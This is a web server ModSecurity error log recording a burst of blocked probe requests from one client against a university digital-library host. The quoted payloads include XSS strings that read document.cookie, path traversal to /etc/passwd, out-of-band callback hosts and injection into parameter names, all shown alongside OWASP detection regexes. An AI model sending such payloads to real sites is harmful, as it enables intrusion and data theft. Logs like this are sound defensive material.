[Tue Aug 29 11:56:52.716737 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:share. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:share: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/giveaway/mygiveaways/"] [unique_id "ZO16lMCo-f0AAAq-Hh8AAAAT"]
[Tue Aug 29 11:56:54.678015 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:order: bszop\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16lsCo-f0AAAoz8RgAAAAS"]
[Tue Aug 29 11:56:56.192647 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO16mMCo-f0AAArIAdIAAAAX"]
[Tue Aug 29 11:56:57.720376 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:LGD_OID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:LGD_OID: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/mobile/shop/lg/mispwapurl.php"] [unique_id "ZO16mcCo-f0AAArB18MAAAAV"]
[Tue Aug 29 11:56:59.734754 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wordpress_user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wordpress_user: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/plugins/wordpress_sso/pages/index.php"] [unique_id "ZO16m8Co-f0AAAolLAQAAAAe"]
[Tue Aug 29 11:57:00.692608 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16nMCo-f0AAArbWQgAAAAG"]
[Tue Aug 29 11:57:01.694681 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nm_member. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nm_member: <script>alert(document.location)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/print.php"] [unique_id "ZO16ncCo-f0AAAq5@a4AAAAK"]
[Tue Aug 29 11:57:01.820403 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:theme. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../../../../../../ found within ARGS:theme: portal/../../../../../../../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/bonita/portal/themeResource"] [unique_id "ZO16ncCo-f0AAAolLBQAAAAe"]
[Tue Aug 29 11:57:02.739052 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:command: <script>alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/webadmin/pkg"] [unique_id "ZO16nsCo-f0AAArbWR0AAAAG"]
[Tue Aug 29 11:57:05.578401 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/church-admin/includes/validate.php"] [unique_id "ZO16ocCo-f0AAAnEqWQAAAAO"]
[Tue Aug 29 11:57:07.552847 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:fieldId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:fieldId: \\x22<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAAnEqXQAAAAO"]
[Tue Aug 29 11:57:07.780371 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post_type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post_type: </option><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16o8Co-f0AAAqqtqgAAAAA"]
[Tue Aug 29 11:57:08.545314 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:jlbqg<script>alert("2Ue0JN1IxddkeI1vtwf86k4xLF5")</script>b7g0x. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: jlbqg<script found within ARGS_NAMES:jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x: jlbqg<script>alert(\\x222Ue0JN1IxddkeI1vtwf86k4xLF5\\x22)</script>b7g0x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO16pMCo-f0AAAq5@dgAAAAK"]
[Tue Aug 29 11:57:08.868457 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16pMCo-f0AAArbWVkAAAAG"]
[Tue Aug 29 11:57:11.551933 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:foodbakery_radius. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:foodbakery_radius: 10\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/listings/"] [unique_id "ZO16p8Co-f0AAAoz8bEAAAAS"]
[Tue Aug 29 11:57:12.214739 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:node_iconfilename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --NONE- found within ARGS:node_iconfilename: --NONE--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/plugins/weathermap/editor.php"] [unique_id "ZO16qMCo-f0AAAnEqZ8AAAAO"]
[Tue Aug 29 11:57:18.560352 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:WaitDuration. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:WaitDuration: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16rsCo-f0AAArbWYQAAAAG"]
[Tue Aug 29 11:57:18.825397 2023] [:error] [pid 2781] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmnijtjmimvgniikdb0fkce1hmn76c5p.oast.site found within TX:1: cjmnijtjmimvgniikdb0fkce1hmn76c5p.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/qards/html2canvasproxy.php"] [unique_id "ZO16rsCo-f0AAArdQhQAAAAI"]
[Tue Aug 29 11:57:20.092955 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:POBatch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:POBatch: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/ProcessWait.aspx"] [unique_id "ZO16sMCo-f0AAArbWY8AAAAG"]
[Tue Aug 29 11:57:23.719607 2023] [:error] [pid 2777] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/>< found within ARGS:type: \\x22/><svg/onload=\\x22alert(document.domain)\\x22/>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16s8Co-f0AAArZP3YAAAAC"]
[Tue Aug 29 11:57:26.167928 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../ found within ARGS:file: /themes/../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/includes/lib/gz.php"] [unique_id "ZO16tsCo-f0AAAm80bYAAAAF"]
[Tue Aug 29 11:57:26.225787 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:appservlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS:appservlang: <svg/onload=confirm('xss')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16tsCo-f0AAAm80bkAAAAF"]
[Tue Aug 29 11:57:27.561015 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:swfloc. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:swfloc: \\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php"] [unique_id "ZO16t8Co-f0AAArLLj0AAAAb"]
[Tue Aug 29 11:57:30.533097 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://\\x0a found within ARGS:url: javascript://\\x0aalert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/adm_program/system/redirect.php"] [unique_id "ZO16usCo-f0AAArbWbUAAAAG"]
[Tue Aug 29 11:57:30.534568 2023] [:error] [pid 2781] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:items[ITEMS][ID]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =\\x22/*\\x22>*/)}); found within ARGS:items[ITEMS][ID]: <a href=\\x22/*\\x22>*/)});function __MobileAppList(){alert(1)}//>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/bitrix/components/bitrix/mobileapp.list/ajax.php/"] [unique_id "ZO16usCo-f0AAArdQj8AAAAI"]
[Tue Aug 29 11:57:30.620007 2023] [:error] [pid 2779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:listing_list_view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:listing_list_view: standard13\\x22</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag 